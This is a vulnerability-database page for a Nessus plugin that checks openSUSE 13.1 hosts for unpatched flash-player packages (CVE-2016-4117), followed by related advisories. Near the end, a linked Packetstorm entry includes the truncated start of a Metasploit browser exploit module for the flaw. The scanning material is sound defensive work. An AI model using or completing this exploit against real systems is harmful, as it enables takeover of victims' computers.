ID OPENSUSE-2016-587.NASL Type nessus Reporter This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2022-03-08T00:00:00
Description
This security update for flash-player to 11.2.202.621 fixes the following issues (boo#979422):
A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. (APSA16-02)
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2016-587.
#
# The text description of this plugin is (C) SUSE LLC.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
# Registration phase: when the scanner loads the plugin with `description` set,
# only metadata is declared and the script exits before any host checks run.
# Plugin identity: Nessus plugin id, plugin revision and last modification date.
script_id(91204);
script_version("2.12");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/03/08");
# Vulnerability references: the single CVE covered by the openSUSE update and a
# CISA Known Exploited Vulnerabilities cross-reference dated 2022/03/24.
script_cve_id("CVE-2016-4117");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/03/24");
script_name(english:"openSUSE Security Update : flash-player (openSUSE-2016-587)");
# Report text shown in scan results (synopsis, description, links, remediation).
script_set_attribute(attribute:"synopsis", value:
"The remote openSUSE host is missing a security update.");
script_set_attribute(attribute:"description", value:
"This security update for flash-player to 11.2.202.621 fixes the
following issues (boo#979422) :
A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player
21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and
Chrome OS. Successful exploitation could cause a crash and potentially
allow an attacker to take control of the affected system. (APSA16-02)
https://helpx.adobe.com/security/products/flash-player/apsa16-02.html");
script_set_attribute(attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=979422");
script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html");
script_set_attribute(attribute:"solution", value:
"Update the affected flash-player packages.");
# Severity: CVSS v2 and v3 base vectors (network, no auth, full C/I/A impact)
# plus temporal vectors.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
# Exploitability metadata: a public exploit exists (named Metasploit module) and
# the flaw is recorded as exploited by malware; these feed prioritisation in reports.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
# Timeline: vulnerability disclosure, vendor patch, and plugin publication dates.
script_set_attribute(attribute:"vuln_publication_date", value:"2016/05/11");
script_set_attribute(attribute:"patch_publication_date", value:"2016/05/17");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/18");
# "local" plugin: it evaluates package data collected from the host rather than
# probing a network service. CPEs name the three affected packages and the one
# supported release (openSUSE 13.1).
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:flash-player");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:flash-player-gnome");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:flash-player-kde4");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:13.1");
script_set_attribute(attribute:"generated_plugin", value:"current");
# Closes the attribute section; keep all script_set_attribute calls above this line.
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"SuSE Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Runtime prerequisites: ssh_get_info.nasl populates the KB keys required below;
# the check phase audits out if any of them is missing.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Check phase: establish that the host is an openSUSE 13.1 x86/x86_64 system with
# an rpm inventory before comparing package versions. Each failed precondition
# ends the plugin through audit() with a specific reason.
# Local checks need the knowledge base gathered over SSH.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

# SLED/SLES are a different product; only the openSUSE 13.1 release string matches.
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)")
{
  audit(AUDIT_OS_NOT, "openSUSE");
}
else if (release !~ "^(SUSE13\.1)$")
{
  audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "13.1", release);
}

# Without the rpm list there is nothing to compare the fixed builds against.
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# The fixed packages referenced below exist only for i586/i686/x86_64.
ourarch = get_kb_item("Host/cpu");
if (!ourarch)
{
  audit(AUDIT_UNKNOWN_ARCH);
}
else if (ourarch !~ "^(i586|i686|x86_64)$")
{
  audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
}
# Compare the installed rpms against the fixed builds from the advisory.
# flag counts the packages rpm_check() reports as vulnerable; the per-package
# findings are presumably collected by rpm.inc for rpm_report_get() later.
flag = 0;
foreach pkg (make_list(
  "flash-player-11.2.202.621-162.1",
  "flash-player-gnome-11.2.202.621-162.1",
  "flash-player-kde4-11.2.202.621-162.1"))
{
  if (rpm_check(release:"SUSE13.1", reference:pkg)) flag++;
}
# Nothing vulnerable found: distinguish "packages present but already at a fixed
# build" from "none of the three packages installed", then stop via audit().
if (!flag)
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "flash-player / flash-player-gnome / flash-player-kde4");
}

# At least one package is at a vulnerable build: raise a critical finding on the
# host (port 0), attaching the per-package comparison only when verbose reporting is on.
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
{"id": "OPENSUSE-2016-587.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : flash-player (openSUSE-2016-587)", "description": "This security update for flash-player to 11.2.202.621 fixes the following issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html", "published": "2016-05-18T00:00:00", "modified": "2022-03-08T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/91204", "reporter": "This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=979422", "https://helpx.adobe.com/security/products/flash-player/apsa16-02.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117"], "cvelist": ["CVE-2016-4117"], "immutableFields": [], "lastseen": "2022-05-18T15:13:43", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201605-16", "ASA-201605-18"]}, {"type": "attackerkb", "idList": ["AKB:2D60486C-E757-4423-BC79-7E5CE137970D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0350"]}, {"type": "cve", "idList": ["CVE-2016-4117"]}, {"type": "exploitdb", "idList": ["EDB-ID:46339"]}, {"type": "fireeye", "idList": ["FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "FIREEYE:529A9C9970A2887D6BB05A18FF5EB97C", "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "FIREEYE:F598C2CB5A87E8844CDF2684E4B9200D", "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "FIREEYE:FE931C46CDF99DA3A4567E123E342C99"]}, {"type": "freebsd", "idList": ["0C6B008D-35C4-11E6-8E82-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-08"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP", "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP/"]}, {"type": "mmpc", "idList": ["MMPC:A8911A071FAE866BC15F59CA0B325D45", "MMPC:AA804B66BAFEF336F846CBD7F0B391A2"]}, {"type": "mscve", "idList": ["MS:ADV160002"]}, {"type": "mssecure", "idList": ["MSSECURE:A133B2DDF50F8BE904591C1BB592991A"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["9354.PRM", "9371.PASL", "ADOBE_AIR_APSB16-15.NASL", "FLASH_PLAYER_APSB16-15.NASL", "FREEBSD_PKG_0C6B008D35C411E68E82002590263BF5.NASL", "GENTOO_GLSA-201606-08.NASL", "GOOGLE_CHROME_50_0_2661_102.NASL", "MACOSX_ADOBE_AIR_APSB16-15.NASL", "MACOSX_FLASH_PLAYER_APSB16-15.NASL", 
"MACOSX_GOOGLE_CHROME_50_0_2661_102.NASL", "OPENSUSE-2016-585.NASL", "REDHAT-RHSA-2016-1079.NASL", "SMB_NT_MS16-064.NASL", "SUSE_SU-2016-1305-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807698", "OPENVAS:1361412562310807699", "OPENVAS:1361412562310808100", "OPENVAS:1361412562310808101", "OPENVAS:1361412562310808102", "OPENVAS:1361412562310808104", "OPENVAS:1361412562310810654", "OPENVAS:1361412562310810655", "OPENVAS:1361412562310810656", "OPENVAS:1361412562310810657", "OPENVAS:1361412562310851312"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151589"]}, {"type": "redhat", "idList": ["RHSA-2016:1079"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-4117"]}, {"type": "securelist", "idList": ["SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1306-1", "OPENSUSE-SU-2016:1308-1", "OPENSUSE-SU-2016:1309-1", "SUSE-SU-2016:1305-1"]}, {"type": "thn", "idList": ["THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "THN:BF8375E3582DA11921BF468B0D3C4F03"]}, {"type": "threatpost", "idList": ["THREATPOST:11EA26F57D7D2191ABB8BCEDAE972C5B", "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "THREATPOST:57A3C5842284FA1358A0BA67A4DECF7D", "THREATPOST:65788483E3FE6F5E155BBFDFEB0DB640", "THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D", "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "THREATPOST:8D1613F1DDC8479184A4F8C93BA951EF", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:D2016D9CC965B5E2634C0B28064F12A0"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-4117"]}, {"type": "zdt", "idList": ["1337DAY-ID-32146"]}]}, "score": {"value": 8.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201605-16", "ASA-201605-18"]}, {"type": "cve", "idList": ["CVE-2016-4117"]}, {"type": "fireeye", "idList": ["FIREEYE:F598C2CB5A87E8844CDF2684E4B9200D"]}, {"type": "freebsd", "idList": 
["0C6B008D-35C4-11E6-8E82-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-08"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "mmpc", "idList": ["MMPC:AA804B66BAFEF336F846CBD7F0B391A2"]}, {"type": "mscve", "idList": ["MS:ADV160002"]}, {"type": "nessus", "idList": ["ADOBE_AIR_APSB16-15.NASL", "FLASH_PLAYER_APSB16-15.NASL", "FREEBSD_PKG_0C6B008D35C411E68E82002590263BF5.NASL", "GOOGLE_CHROME_50_0_2661_102.NASL", "MACOSX_GOOGLE_CHROME_50_0_2661_102.NASL", "REDHAT-RHSA-2016-1079.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810656"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151589"]}, {"type": "securelist", "idList": ["SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1308-1", "OPENSUSE-SU-2016:1309-1"]}, {"type": "threatpost", "idList": ["THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D"]}, {"type": "zdt", "idList": ["1337DAY-ID-32146"]}]}, "exploitation": null, "vulnersScore": 8.2}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "91204", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-587.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91204);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-4117\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-587)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This security update for 
flash-player to 11.2.202.621 fixes the\nfollowing issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and\nChrome OS. Successful exploitation could cause a crash and potentially\nallow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.621-162.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.621-162.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.621-162.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.1"], "solution": "Update the affected flash-player packages.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2016-05-17T00:00:00", "vulnerabilityPublicationDate": "2016-05-11T00:00:00", "exploitableWith": ["Metasploit(Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion)"]}
{"suse": [{"lastseen": "2016-09-04T12:14:55", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. (APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n", "cvss3": {}, "published": "2016-05-17T14:08:54", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-17T14:08:54", "id": "OPENSUSE-SU-2016:1308-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00046.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:25:42", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. 
(APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n", "cvss3": {}, "published": "2016-05-17T14:09:11", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-17T14:09:11", "id": "OPENSUSE-SU-2016:1309-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00047.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:59:17", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. 
(APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n Some CVEs were not listed in the last submission:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-17T02:07:54", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2016-05-17T02:07:54", "id": "OPENSUSE-SU-2016:1306-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00045.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:44:54", "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, 
CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-16T18:08:08", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2016-05-16T18:08:08", "id": "SUSE-SU-2016:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00044.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2019-02-10T19:00:54", "description": "", "cvss3": {}, "published": "2019-02-09T00:00:00", "type": "packetstorm", "title": "Adobe Flash 
Player DeleteRangeTimelineOperation Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2019-02-09T00:00:00", "id": "PACKETSTORM:151589", "href": "https://packetstormsecurity.com/files/151589/Adobe-Flash-Player-DeleteRangeTimelineOperation-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion', \n'Description' => %q( \nThis module exploits a type confusion on Adobe Flash Player, which was \noriginally found being successfully exploited in the wild. This module \nhas been tested successfully on: \nmacOS Sierra 10.12.3, \nSafari and Adobe Flash Player 21.0.0.182, \nFirefox and Adobe Flash Player 21.0.0.182. 
\n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Genwei Jiang', # FireEye original blog details on the vulnerability \n'bcook-r7' # Imported Metasploit module \n], \n'References' => \n[ \n['CVE', '2016-4117'], \n['BID', '90505'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'], \n['URL', 'http://www.securitytracker.com/id/1035826'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'], \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['osx'], \n'BrowserRequirements' => \n{ \nsource: /script|headers/i, \nos_name: lambda do |os| \nos =~ OperatingSystems::Match::MAC_OSX \nend, \nua_name: lambda do |ua| \ncase target.name \nwhen 'Mac OS X' \nreturn true if ua == Msf::HttpClients::SAFARI \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \nflash: lambda do |ver| \ncase target.name \nwhen 'Mac OS X' \nreturn true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ \n'Mac OS X', { \n'Platform' => 'osx', \n'Arch' => ARCH_X64 \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 27 2016', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri.end_with? 
